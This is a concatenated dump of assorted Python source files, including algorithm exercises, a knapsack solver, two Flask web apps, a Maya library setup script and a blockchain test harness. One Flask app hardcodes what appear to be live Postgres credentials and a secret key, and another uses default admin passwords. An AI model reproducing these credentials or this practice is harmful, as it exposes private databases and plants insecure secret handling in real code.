清理控制台和工作线程的多余未处理时间,以便再次启动有之前的残留事件。\n self.con_worker.clean()\n self.workers.clean()\n\n def set_limit(self, max_speed):\n \"\"\" 开启下载管理器全局限速。\"\"\"\n self.configure.max_speed = max_speed\n if max_speed is None:\n # 最大速度为None则是关闭限速。\n self.workers.dispatch(EVT_MANAGER_WORKER_SPEED_LIMIT, False, context={'running': self.__queue.running})\n else:\n self.workers.dispatch(EVT_MANAGER_WORKER_SPEED_LIMIT, True, context={'running': self.__queue.running})\n\n def __snapshot__(self):\n return {\n 'configure': self.configure.__snapshot__(),\n 'queue': self.__queue.__snapshot__()\n }\n\n export = __snapshot__\n","sub_path":"nbdler/manager/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":10755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"123214966","text":"import random\nimport math\nimport sys\nrandom.seed(666)\n\n\nclass Solution():\n def findMedianSortedArrays(self, nums1: list, nums2: list):\n '''\n 解法一:关键在于找到两个列表的各自切分点,这个切分点满足中位数,而这个切分点的寻找过程需要使用到二分法\n 解法二:需要找到第k个元素,可以利用数据的有序性不断削减问题规模\n 解法三:各自找中位数,去除不符合的部分,依次迭代(这个只适用于两个等长序列)\n '''\n # 解法一\n if len(nums1) < len(nums2):\n nums1, nums2 = nums2, nums1\n if len(nums2) == 0:\n return nums1[len(nums1)//2] if len(nums1) % 2 else (nums1[len(nums1)//2]+nums1[len(nums1)//2-1])/2\n left_bound = (len(nums1)-len(nums2))//2\n right_bound = (len(nums1)+len(nums2))//2\n while left_bound <= right_bound:\n mid_1 = (left_bound+right_bound)//2\n mid_2 = (len(nums1)+len(nums2))//2-mid_1\n if mid_1 > 0 and mid_2 < len(nums2) and nums1[mid_1-1] > nums2[mid_2]:\n right_bound = mid_1-1\n elif mid_1 < len(nums1) and mid_2 > 0 and nums1[mid_1] < nums2[mid_2-1]:\n left_bound = mid_1+1\n else:\n if mid_1 < len(nums1) and mid_2 < len(nums2):\n right_min = min(nums1[mid_1], nums2[mid_2])\n else:\n right_min = nums1[mid_1] if mid_1 < len(nums1) else nums2[mid_2]\n if (len(nums1)+len(nums2)) % 2:\n return right_min\n if mid_1 > 0 and mid_2 > 0:\n left_max = max(nums1[mid_1-1], nums2[mid_2-1])\n else:\n left_max = nums1[mid_1-1] if mid_1 > 0 else nums2[mid_2-1]\n return (left_max+right_min)/2\n\n def sortArray(self, nums: list):\n # 栈插入排序,超时\n '''\n if not len(nums):\n return nums\n temp = nums.pop()\n sortarray = []\n while len(nums) or (len(sortarray) and sortarray[-1] > temp): # 用栈实现插入排序的移动操作,关键在于最后一个元素需要保证其大于等于排序数组的栈顶\n if len(sortarray) == 0 or temp >= sortarray[-1]:\n sortarray.append(temp)\n temp = nums.pop()\n else:\n nums.append(sortarray.pop())\n sortarray.append(temp)\n return sortarray\n '''\n ''' \n # 快排实现一:从两端往中间分割的方法\n # 既然需要两端交替,那么可以安排每一轮两端都看一下,使用while循环嵌套while循环\n def temp_sort(left, right): # 一定要清楚left和right代表的意义\n if left == right:\n return\n refer = nums[left]\n left_pos, right_pos = left, right-1\n while left_pos < right_pos: # 使用三个循环实现左右左右左右的依次操作\n while left_pos < right_pos and nums[right_pos] >= refer:\n right_pos -= 1\n nums[left_pos] = nums[right_pos]\n while left_pos < right_pos and nums[left_pos] < refer:\n left_pos += 1\n nums[right_pos] = nums[left_pos]\n midindex = left_pos\n nums[midindex] = refer # 最后需要放回取出的refer元素\n temp_sort(left, midindex)\n temp_sort(midindex+1, right) # 注意refer在的位置是已经确定的\n temp_sort(0, len(nums))\n return(nums)\n '''\n # 快排实现一:简化版\n def temp_sort(left, right): # 此时选取的left和right为闭区间\n if left >= right:\n return\n refer = nums[left] # 随机选择一个数\n left_pos, right_pos = left, right # 定义遍历起点\n while left_pos < right_pos: # 使用三个循环实现左右左右左右的依次操作\n while nums[right_pos] >= refer and left_pos < right_pos:\n right_pos -= 1\n nums[left_pos] = nums[right_pos]\n while nums[left_pos] <= refer and left_pos < right_pos:\n left_pos += 1\n nums[right_pos] = nums[left_pos]\n nums[left_pos] = refer\n temp_sort(left, left_pos-1)\n temp_sort(right_pos+1, right) # 注意refer在的位置是已经确定的\n temp_sort(0, len(nums)-1)\n return(nums)\n '''\n # 快排实现二:关键是将数组分成三段,其中[left+1,mid)是小于部分,[mid,k)是大于部分,而[k,right)是未遍历部分\n def temp_sort(left, right):\n if right-left == 0:\n return\n refer = nums[left]\n midindex = left+1\n for k in range(left+1, right):\n if nums[k] < refer: # 滚动大于的部分\n nums[k], nums[midindex] = nums[midindex], nums[k]\n midindex += 1\n nums[left], nums[midindex-1] = nums[midindex-1], nums[left] # 最后需要将参考结点放置到该有的位置\n temp_sort(left, midindex-1) # 注意参考点一定是放好位置的\n temp_sort(midindex, right)\n temp_sort(0, len(nums))\n return(nums)\n '''\n '''\n # 堆排序,注意从小到大排序需要建立大顶堆\n def down_filter(temp_index, heap_lenght): # 建堆时需要确定堆的大小\n left_c = temp_index*2+1\n right_c = temp_index*2+2\n if left_c >= heap_lenght and right_c >= heap_lenght:\n return\n else:\n if right_c >= heap_lenght:\n choose = left_c\n else:\n choose = left_c if nums[left_c] > nums[right_c] else right_c\n if nums[choose] > nums[temp_index]:\n nums[choose], nums[temp_index] = nums[temp_index], nums[choose]\n down_filter(choose, heap_lenght) # 递归\n for k in range(len(nums)-1, -1, -1): # 从下往上建堆更快\n down_filter(k, len(nums))\n for k in range(len(nums)-1, -1, -1):\n nums[0], nums[k] = nums[k], nums[0]\n down_filter(0, k)\n return(nums)\n '''\n\n def trap(self, height):\n # 接雨水,关键是将雨水分成两种考虑,一种是靠着右边墙面的,一种是靠着左边墙面的\n if len(height) == 0:\n return 0\n result = 0\n refer_left = height[0]\n temp_result = 0\n for index in range(1, len(height)):\n if height[index] <= refer_left:\n temp_result += (refer_left-height[index])\n else:\n refer_left = height[index]\n result += temp_result\n temp_result = 0\n temp_result = 0\n refer_right = height[len(height)-1]\n for index in range(len(height)-2, -1, -1):\n if height[index] < refer_right:\n temp_result += (refer_right-height[index])\n else:\n refer_right = height[index]\n result += temp_result\n temp_result = 0\n return result\n\n def maximumGap(self, nums):\n # 数组中的最大间隔,使用桶分割元素快速计算\n if len(nums) < 2:\n return 0\n max_num, min_num = max(nums), min(nums)\n box_size = max((max_num-min_num)//(len(nums)-1), 1) # 选取box大小,确保n个box涵盖数值区域,且最后一个桶一定涵盖最后一个元素,防止取0\n box_num = (max_num-min_num)//box_size+1 # 这种情况下桶的个数会超过n\n box_list = [[] for _ in range(box_num)]\n for num in nums:\n box_index = (num-min_num)//box_size\n box_list[box_index].append(num)\n new_list = [box for box in box_list if box] # 剔除空元素\n result = 0\n for box_index in range(1, len(new_list)):\n result = max(result, min(new_list[box_index])-max(new_list[box_index-1])) # 鸽巢原理可以保证两个box之间的差异大于box内部的差异\n return result\n\n def searchRange(self, nums, target):\n # 排序数组定位某一个元素的边界,采用二分查找\n # 首先明确问题的定义,找到大于目标结点的最小index,找到小于目标结点得最大index,注意如果直接找相等的边界不好定义\n # 明确定义后需要处理边界条件\n nums = [-sys.maxsize-1]+nums+[sys.maxsize]\n\n def find_right(left, right): # 在范围内返回大于target的最小idnex\n if left == right:\n return left\n mid = (left+right)//2\n if nums[mid] <= target:\n return find_right(mid+1, right)\n else:\n return find_right(left, mid)\n\n def find_left(left, right):\n if left == right:\n return left\n mid = (left+right+1)//2 # 注意此时取上整\n if nums[mid] >= target:\n return find_left(left, mid-1)\n else:\n return find_left(mid, right)\n\n right_index = find_right(0, len(nums)-1)\n left_index = find_left(0, len(nums)-1)\n return [left_index, right_index-2] if right_index-left_index > 1 else [-1, -1]\n\n\nif __name__ == '__main__':\n solu = Solution()\n # result = solu.sortArray([5, 2, 3, 1])\n # result = solu.trap([0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1])\n # result = solu.maximumGap([1, 1, 1, 1])\n result = solu.searchRange([5, 7, 7, 8, 8, 10], 8)\n pass\n","sub_path":"Origin/Leetcode/Solution/array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":9732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"653179475","text":"from fractions import Fraction\nimport numpy as np \nfrom ortools.linear_solver import pywraplp\n\ndef read_data(path):\n with open(path) as f:\n N, M = list(map(int, f.readline().split()))\n C = list(map(Fraction, f.readline().split()))\n A = []\n b = []\n for _ in range(M):\n line = list(map(Fraction, f.readline().split()))\n A.append(line[:-1])\n b.append(line[-1])\n return A, b, C\n\ndef knapsack(values, weights, capacity ):\n solver = pywraplp.Solver('knapshack_model', pywraplp.Solver.CBC_MIXED_INTEGER_PROGRAMMING)\n n = len(values)\n x = np.empty(n, dtype = object)\n\n for i in range(n):\n x[i] = solver.BoolVar('x%i' %i)\n bag = solver.Constraint(0, float(capacity))\n for i in range(n):\n bag.SetCoefficient(x[i], float(weights[i]))\n\n obj = solver.Objective()\n for i in range(n):\n obj.SetCoefficient(x[i], float(values[i]))\n obj.SetMaximization()\n\n status = solver.Solve()\n\n if not status == pywraplp.Solver.OPTIMAL:\n return None\n \n x_vals = [False]*n\n for i in range(n):\n x_vals[i] = False if int(x[i].solution_value()) == 0 else True\n return obj.value() , x_vals\n\n \n ","sub_path":"Gomory_cut_edition1.0/knapsackMIP.py","file_name":"knapsackMIP.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"19913659","text":"import os\nimport base64\nimport sqlite3\nfrom flask import Flask, request, session, g, redirect, url_for, abort, \\\n render_template, flash\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\napp.config.update(dict(\n DATABASE= os.path.join(app.root_path, 'linku.db'),\n SECRET_KEY= 'development key',\n USERNAME= 'admin',\n PASSWORD= 'admindefault'\n ))\napp.config.from_envvar('LINKU_SETTINGS', silent=True)\n\ndef connect_db():\n '''Connects to db'''\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv\n\ndef get_db():\n '''Opens new db connection if none exist yet.'''\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\n@app.teardown_appcontext\ndef close_db(error):\n '''closes db at the end of request.'''\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\ndef init_db():\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n@app.cli.command('initdb')\ndef initdb_command():\n '''Initialize db.'''\n init_db()\n print('Initialized the database.')\n\n@app.route('/')\ndef index():\n db = get_db()\n cur = db.execute('select id, link from links order by id asc')\n link_entries = cur.fetchall()\n return render_template('index.html', link_entries=link_entries)\n\n@app.route('/add', methods=['POST'])\ndef add_link():\n db = get_db()\n cur = db.execute('insert into links (link) values (?)',[request.form['link']])\n db.commit()\n db_id = cur.lastrowid\n \n shorted_url = encodes(db_id).decode()\n domain = url_for('index', _external=True)\n link = domain + '{}'.format(shorted_url)\n\n flash('link added. visit at {}'.format(link))\n return redirect(url_for('index'))\n\n@app.route('/')\ndef gotolink(link_byte):\n db=get_db()\n link_id = decodes(link_byte)\n cur = db.execute('select link from links where id=?', (link_id,))\n link = cur.fetchone()\n if link:\n return redirect('http://' + link[0], code=302)\n else:\n abort(404)\n\ndef encodes(i):\n s = str(i).encode()\n return base64.urlsafe_b64encode(s)\n\ndef decodes(s):\n ss= s.encode()\n i = base64.urlsafe_b64decode(ss)\n return int(i.decode())\n","sub_path":"linku/linku.py","file_name":"linku.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"322913695","text":"import os\nfrom yolo_video import start\nfrom flask import Flask, flash, request, redirect, url_for, render_template, session, g, Markup\nfrom werkzeug.utils import secure_filename\nfrom utils import detect_image\nimport base64\nimport cv2\nimport numpy as np\nimport keras.backend as K\nimport random\nimport string\nimport psycopg2\n\napp = Flask(__name__,static_url_path=('/static'))\napp.config['SQLAlCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLAlCHEMY_DATABASE_URI'] = 'postgres://jlbzqjdoaixcjn:550ecbc824bc536e282ef94ed45d3a61e1a8ac0f1ae6b99b8822ba28451006ec@ec2-54-197-34-207.compute-1.amazonaws.com:5432/d2ce06aa7se8s1'\napp.config['SECRET_KEY'] = '550ecbc824bc536e282ef94ed45d3a61e1a8ac0f1ae6b99b8822ba284515140'\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True\napp.config['SQLALCHEMY_ECHO']=True\n\n\n'''\nclass admin_data(db.Model):\n username = db.Column(db.String(20),primary_key = True)\n password = db.Column(db.String(200),unique=False,primary_key = False)\n name = db.Column(db.String(100),unique=False,primary_key = False)\n email = db.Column(db.String(100),unique=False,primary_key = False)\n mobile = db.Column(db.String(20),unique=False,primary_key = False)\n modify_date = db.Column(db.DateTime,unique=False,primary_key = False)\n def __repr__(self):\n return '' % self.username\nquery = admin_data.query.filter_by(username=\"admin_t\").first()\nprint(\"\\n\\n\\n\\n\\n\\n\\n Heloo\",query.username,\"\\n\\n\\n\\n\\n\\n\\n\")\n'''\n\ndef randomString(stringLength=10):\n \"\"\"Generate a random string of fixed length\"\"\"\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(stringLength))\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\nconn = psycopg2.connect(host='ec2-54-197-34-207.compute-1.amazonaws.com',user='jlbzqjdoaixcjn',password='550ecbc824bc536e282ef94ed45d3a61e1a8ac0f1ae6b99b8822ba28451006ec',database='d2ce06aa7se8s1')\nUPLOAD_FOLDER = '/app/static/inputdata/'\napp.secret_key= os.urandom(24)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nprint(\"\\n\\n\\n\\n\\n\\n\\n\\n\",os.path.join(os.path.abspath(os.getcwd()), '/static/inputdata/'))\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n \ndef format_datetime(value, format='medium'):\n if format == 'full':\n format=\"EEEE, d. MMMM y 'at' HH:mm\"\n elif format == 'medium':\n format=\"EE dd.MM.y HH:mm\"\n return babel.dates.format_datetime(value, format)\napp.jinja_env.filters['datetime'] = format_datetime\n\n@app.route('/')\ndef init():\n with conn: \n cur = conn.cursor()\n try:\n cur.execute(\"select info_desc from process where info_num = 1\")\n text = cur.fetchall()\n cur.execute(\"select * from news order by id desc\")\n news = cur.fetchall()\n except mysql.Error as e:\n print(e) \n cur.close()\n i=0\n news_title=[]\n news_desc=[]\n news_subtitle=[]\n news_img_list=[]\n news_index=[]\n while i < len(news):\n news_img_list.append(news[i][4].split(\",\"))\n news_desc.append(Markup(news[i][3]))\n news_subtitle.append(Markup(news[i][2]))\n news_title.append(Markup(news[i][1]))\n news_index.append(Markup(news[i][0]))\n i+=1\n \n return render_template('index.html',news_index=news_index, text = Markup(text[0][0]),news_title=news_title,news_subtitle=news_subtitle,news_desc=news_desc,news_img=news_img_list)\n \n@app.route('/gesture')\ndef phra():\n with conn:\n cur = conn.cursor()\n query = \"select * from description\"\n cur.execute(query)\n gesture = cur.fetchall()\n cur.close()\n model = []\n i=0\n while i )\n\n#print dictionaries\nfor (animal, number) in legs.items():\n print(\"{} has {} legs\".format(animal, number))\n\n#add element to dic dic[\"key\"] = value\nlegs[\"spider\"] = 65\nprint(legs)\n\n#modify a value in dic\nlegs[\"spider\"] = 8\n\n#they key can't be modified\n\n#the del statment works the same as lists with dictionaries\n\n#get the value of a key\nprint(legs[\"ant\"]) #if the key doesn't exit it gives error\n\n#to avoid the error use the method dic.get(\"key\") or dic.get(\"key\", \"a vlue to be used in case the key doesn't exist\")\nlegs.get(\"legs\", \"Not present\")\n\n#clear all emelents\nlegs.clear() # works the same with lists\n\n","sub_path":"list_dict.py","file_name":"list_dict.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"470485872","text":"# -*- coding: utf-8 -*-\nfrom PIL import Image\n\n__author__ = 'song'\n\n\ndef func1():\n im = Image.open('test.jpg')\n print(im.format, im.size, im.mode)\n im.thumbnail((200, 100))\n im.save('thumb.png', 'PNG')\n\n\nif __name__ == '__main__':\n func1()\n","sub_path":"other/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"103499350","text":"import json\nimport os\nimport sgtk\nfrom maya import cmds\n\nAPP = sgtk.platform.current_engine()\nPROJECT_PATH = APP.tank.project_path\nTK = sgtk.sgtk_from_path(PROJECT_PATH)\nCTX = TK.context_from_path(PROJECT_PATH)\nCONFIG = APP.context.tank.pipeline_configuration\n\nclass zombieSettings:\n def __init__(self):\n self.project_library = os.path.join(PROJECT_PATH, self.getPipe(), 'data', 'StudioLibrary')\n self.types = []\n self.projectId = CTX.project['id']\n\n self.createDataBase()\n self.setPathSettings()\n\n self.assets = APP.shotgun.find('Asset', [['project.Project.id', 'is', self.projectId]], ['code', 'sg_asset_type'])\n self.sequence = APP.shotgun.find('Sequence', [['project.Project.id', 'is', self.projectId]], ['code'])\n self.shots = APP.shotgun.find('Shot', [['project.Project.id', 'is', self.projectId]], ['code', 'sg_sequence'])\n\n self.getTypes()\n self.createAssets()\n self.createShots()\n\n def getTypes(self):\n for asset in self.assets:\n self.types.append(asset['sg_asset_type'])\n self.types = list(dict.fromkeys(self.types))\n\n def createAssets(self):\n if not os.path.exists(os.path.join(self.project_library, 'Assets')):\n os.mkdir(os.path.join(self.project_library, 'Assets'))\n\n for type in self.types:\n if not os.path.exists(os.path.join(self.project_library, 'Assets', type)):\n os.mkdir(os.path.join(self.project_library, 'Assets', type))\n\n for asset in self.assets:\n if asset['sg_asset_type'] == type:\n if not os.path.exists(os.path.join(self.project_library, 'Assets', type, asset['code'])):\n os.mkdir(os.path.join(self.project_library, 'Assets', type, asset['code']))\n\n def createShots(self):\n if not os.path.exists(os.path.join(self.project_library, 'Shots')):\n os.mkdir(os.path.join(self.project_library, 'Shots'))\n\n for seq in self.sequence:\n if not os.path.exists(os.path.join(self.project_library, 'Shots', seq['code'])):\n os.mkdir(os.path.join(self.project_library, 'Shots', seq['code']))\n\n for shot in self.shots:\n if seq['code'] == shot['sg_sequence']['name']:\n if not os.path.exists(os.path.join(self.project_library, 'Shots', seq['code'], shot['code'])):\n os.mkdir(os.path.join(self.project_library, 'Shots', seq['code'], shot['code']))\n\n def createDataBase(self):\n if not os.path.exists(self.project_library):\n os.makedirs(self.project_library)\n os.mkdir('{}\\\\.studiolibrary'.format(self.project_library))\n databse = '{}\\\\.studiolibrary\\\\database.json'.format(self.project_library)\n with open(databse, 'w') as outfile:\n json.dump({}, outfile)\n\n def setPathSettings(self):\n pathStudiLibrarySettings = os.path.join(os.environ['appdata'], 'StudioLibrary', 'LibraryWidget.json')\n with open(pathStudiLibrarySettings) as data:\n settings = json.load(data)\n settings['Default']['path'] = self.project_library\n with open(pathStudiLibrarySettings, 'w') as outSettings:\n json.dump(settings, outSettings)\n\n def getPipe(self):\n if 'Anim' not in CONFIG.get_name():\n return '02_prod'\n else:\n return '06_prod_anim'\n","sub_path":"Zombie/zsPanel/animation/studiolibrary/zombie.py","file_name":"zombie.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"595646018","text":"import logging\nimport os\n\nfrom subprocess import Popen, PIPE, STDOUT\nfrom time import sleep\n\nimport yaml\n\nfrom mainnet.builder import import_keys, WALLET_PASSWORD\nfrom mainnet.env import und, undcli, rpc_endpoint, undcli_home\nfrom mainnet.systemtest.models import (\n Registration, HashSubmission, BeaconSubmission, BeaconRegistration)\nfrom mainnet.systemtest.generator import (\n generate_dataset, generate_beacon_dataset)\n\nlog = logging.getLogger(__name__)\n\nUND = und()\nUNDCLI = undcli()\n\nCHAINID = 'UND-Mainchain-DevNet'\n\n\ndef undcli_query(params, sign=False):\n node = rpc_endpoint()\n\n cmd = [UNDCLI] + params + ['--chain-id', CHAINID, '--node', node]\n\n if sign:\n cmd = cmd + ['--from', 'node1', '--yes', '--broadcast-mode=block',\n '--home', undcli_home(), '--keyring-backend', 'test']\n cmd = list(map(str, cmd))\n log.debug(' '.join(cmd))\n p = Popen(cmd, stdout=PIPE, stdin=PIPE, stderr=STDOUT)\n stdout, stderr = p.communicate(input=WALLET_PASSWORD)\n else:\n log.debug(' '.join(cmd))\n cmd = list(map(str, cmd))\n p = Popen(cmd, stdout=PIPE, stdin=PIPE, stderr=STDOUT)\n stdout, stderr = p.communicate()\n\n decoded = stdout.decode('utf-8')\n error = decoded.split('\\n')[0] == 'ERROR: ERROR:'\n if error:\n log.warning(decoded)\n return None\n try:\n d = yaml.safe_load(decoded)\n except Exception as e:\n return None\n return d\n\n\ndef register_wrkchain(registration: Registration):\n log.info(f'Registering WRKChain: {registration.FriendlyName}')\n d = undcli_query(\n ['tx', 'wrkchain', 'register',\n f'--moniker={registration.WrkChainID}',\n f'--genesis={registration.GenesisHash}',\n f'--name={registration.FriendlyName}',\n f'--base=geth'], sign=True)\n if d is None:\n return None\n if d['codespace'] == \"\":\n return d['txhash']\n else:\n log.warning(f'Error registering: {d[\"rawlog\"]}')\n return None\n\n\ndef register_beacon(registration: BeaconRegistration):\n log.info(f'Registering Beacon: {registration.FriendlyName}')\n d = undcli_query(\n ['tx', 'beacon', 'register',\n f'--moniker={registration.BeaconID}',\n f'--name={registration.FriendlyName}'], sign=True)\n print(d)\n if d is None:\n return None\n if d['codespace'] == \"\":\n return d['txhash']\n else:\n log.warning(f'Error registering: {d[\"rawlog\"]}')\n return None\n\n\ndef submithash(submission: HashSubmission):\n log.info(f'Submitting hash: {submission.BlockHash}')\n d = undcli_query(\n ['tx', 'wrkchain', 'record',\n submission.WrkChainID,\n f'--wc_height={submission.Height}',\n f'--block_hash={submission.BlockHash}',\n f'--parent_hash={submission.ParentHash}',\n f'--hash1={submission.Hash1}',\n f'--hash2={submission.Hash2}',\n f'--hash3={submission.Hash3}'], sign=True)\n if d is None:\n return None\n\n if d['codespace'] == \"\":\n return d['txhash']\n else:\n log.warning(f'Error submitting hash: {d[\"rawlog\"]}')\n return None\n\n\ndef submit_beacon_hash(submission: BeaconSubmission):\n log.info(f'Submitting hash: {submission}')\n d = undcli_query(\n ['tx', 'beacon', 'record',\n submission.BeaconChainID,\n f'--hash={submission.Hash}',\n f'--subtime={submission.Subtime}'], sign=True)\n if d is None:\n return None\n\n if d['codespace'] == \"\":\n return d['txhash']\n else:\n log.warning(f'Error submitting hash: {d[\"rawlog\"]}')\n return None\n\n\ndef query_wrkchain_meta(wrkchain_id):\n d = undcli_query(['query', 'wrkchain', 'wrkchain', str(wrkchain_id)])\n return d\n\n\ndef query(wrkchain_id):\n log.info(f'Query blocks for WRKChain {wrkchain_id}')\n meta_data = query_wrkchain_meta(wrkchain_id)\n if meta_data is None:\n return None\n\n for i in range(meta_data['lastblock']):\n height = i + 1\n d = undcli_query(['query', 'wrkchain', 'block', str(wrkchain_id),\n str(height)])\n\n if isinstance(d, dict):\n log.info(f'found hash for wrkchain: {d[\"wrkchainid\"]} '\n f'for wrkchain height {d[\"height\"]}')\n submission = HashSubmission(\n int(d['wrkchainid']), int(d['height']), d['blockhash'],\n d['parenthash'], d['hash1'], d['hash2'], d['hash3'])\n yield submission\n\n\ndef query_beacon_submissions(beacon_id):\n d = undcli_query(['query', 'beacon', 'beacon', str(beacon_id)])\n if d is None:\n return None\n\n for i in range(d['lasttimestampid']):\n d = undcli_query(\n ['query', 'beacon', 'timestamp', str(beacon_id), str(i + 1)])\n yield BeaconSubmission(d['beaconid'], d['hash'], d['submittime'])\n\n\ndef validate_hash(txhash):\n d = undcli_query(['query', 'tx', txhash])\n if d is None:\n log.warning(f'Something went wrong validating hash')\n return None\n\n if d['codespace'] == \"\":\n log.info(f'Transaction {txhash} is valid')\n return d\n else:\n log.warning(f'Transaction {txhash} is invalid')\n log.info(d['rawlog'])\n return d\n\n\ndef compare_attribute(base, target, attr):\n a = getattr(base, attr)\n b = getattr(target, attr)\n log.info(f'Comparing {attr} {a} with {b}')\n if a != b:\n raise Exception('Mismatched data')\n\n\ndef compare_submissions(base: [HashSubmission], target: [HashSubmission]):\n if len(base) != len(target):\n raise Exception('Mismatched number of submissions')\n for i in range(len(base)):\n a = base[i]\n b = target[i]\n log.info(\n f'Comparing WRKChain {a.WrkChainID} at height {a.Height} with '\n f'WRKChain {b.WrkChainID} at height {b.Height}')\n for attr in ['BlockHash', 'ParentHash', 'Hash1', 'Hash2', 'Hash3']:\n compare_attribute(a, b, attr)\n\n\ndef compare_beacon_submissions(\n base: [BeaconSubmission], target: [BeaconSubmission]):\n if len(base) != len(target):\n raise Exception('Mismatched number of submissions')\n for i in range(len(base)):\n a = base[i]\n b = target[i]\n log.info(\n f'Comparing Beacon {a.BeaconChainID} at height {a.Subtime} with '\n f'Beacon {b.BeaconChainID} at height {b.Subtime}')\n for attr in ['Hash']:\n compare_attribute(a, b, attr)\n\n\ndef sleep_forever():\n log.info(\"Sleeping forever\")\n sleep(60 * 60 * 24)\n\n\ndef main():\n logging.basicConfig(level=os.environ.get(\"LOGLEVEL\", \"DEBUG\"))\n\n wrkchain_datasets = generate_dataset()\n beacon_datasets = generate_beacon_dataset()\n\n import_keys(keys_dir='/root/.go/src/github.com/unification-com/mainchain/'\n 'Docker/assets/keys', backend='test')\n sleep(5)\n hashes = []\n\n for beacon_dataset in beacon_datasets:\n registration_hash = register_beacon(beacon_dataset.BeaconRegistration)\n hashes.append(registration_hash)\n\n for dataset in wrkchain_datasets:\n registration_hash = register_wrkchain(dataset.Registration)\n hashes.append(registration_hash)\n\n for beacon_dataset in beacon_datasets:\n for submission in beacon_dataset.BeaconSubmissions:\n hashes.append(submit_beacon_hash(submission))\n\n for dataset in wrkchain_datasets:\n for submission in dataset.Submissions:\n hashes.append(submithash(submission))\n\n for dataset in wrkchain_datasets:\n results = list(query(int(dataset.Registration.WrkChainID)))\n target = sorted(results, key=lambda x: int(x.Height))\n base = sorted(dataset.Submissions, key=lambda x: int(x.Height))\n compare_submissions(base, target)\n\n for dataset in beacon_datasets:\n results = list(\n query_beacon_submissions(dataset.BeaconRegistration.BeaconID))\n target = sorted(results, key=lambda x: int(x.Subtime))\n base = sorted(dataset.BeaconSubmissions, key=lambda x: int(x.Subtime))\n compare_beacon_submissions(base, target)\n\n sleep(5)\n\n for txhash in hashes:\n if txhash is not None:\n validate_hash(txhash)\n\n sleep(120)\n log.info(\"Checking that restored data exists\")\n\n for dataset in beacon_datasets:\n results = list(\n query_beacon_submissions(dataset.BeaconRegistration.BeaconID))\n target = sorted(results, key=lambda x: int(x.Subtime))\n base = sorted(dataset.BeaconSubmissions, key=lambda x: int(x.Subtime))\n compare_beacon_submissions(base, target)\n\n for dataset in wrkchain_datasets:\n results = list(query(int(dataset.Registration.WrkChainID)))\n target = sorted(results, key=lambda x: x.Height)\n base = sorted(dataset.Submissions, key=lambda x: x.Height)\n compare_submissions(base, target)\n\n sleep_forever()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/mainnet/systemtest/wrkchain.py","file_name":"wrkchain.py","file_ext":"py","file_size_in_byte":8928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"157810364","text":"\"\"\"\nCreate users table\n\nRevision ID: 2a55de3a35ee\nRevises: 40aa1a9694cf\nCreate Date: 2017-02-28 08:19:35.762706\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '2a55de3a35ee'\ndown_revision = '40aa1a9694cf'\n\nfrom alembic import op\nfrom sqlalchemy import Column, Integer, Unicode, PrimaryKeyConstraint\nfrom sqlalchemy.dialects.postgresql import JSONB\n\n\ndef upgrade():\n op.create_table('users',\n Column('id', Integer(), nullable=False),\n Column('first_name', Unicode()),\n Column('last_name', Unicode()),\n Column('data', JSONB()),\n PrimaryKeyConstraint('id')\n )\n\n\ndef downgrade():\n op.drop_table('users')\n","sub_path":"migrations/versions/2a55de3a35ee_user.py","file_name":"2a55de3a35ee_user.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"335834936","text":"\n# SPDX-License-Identifier: MIT\n# Copyright (c) 2016-2020 Michael Purcaro, Henry Pratt, Jill Moore, Zhiping Weng\n\nfrom __future__ import print_function\n\nimport sys\nimport os\nimport glob\n\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../../../../metadata/utils\"))\nfrom exp import Exp\nfrom exp_file import ExpFile\n\n\nclass CreateHg38:\n LISTFILES = [\"dnase-list.txt\", \"h3k4me3-list.txt\", \"h3k27ac-list.txt\", \"ctcf-list.txt\"]\n\n @staticmethod\n def _process(exp, tassembly=\"GRCh38\"):\n allsignal = glob.glob(\"/data/projects/encode/data/%s/*.bigWig\" % exp.encodeID)\n signal = {}\n for signalfile in allsignal:\n f = ExpFile.fromJsonFile(exp.encodeID, os.path.basename(signalfile).split(\".\")[0], True)\n if f.assembly == tassembly:\n signal[f.biological_replicates[0]] = f\n peaks = {x.biological_replicates[0]: x for x in filter(lambda x: x.assembly == tassembly and x.file_type == \"bed broadPeak\", exp.files)}\n return (peaks, signal)\n\n @staticmethod\n def _writehotspots(filemap, path):\n with open(path, \"wb\") as o:\n for 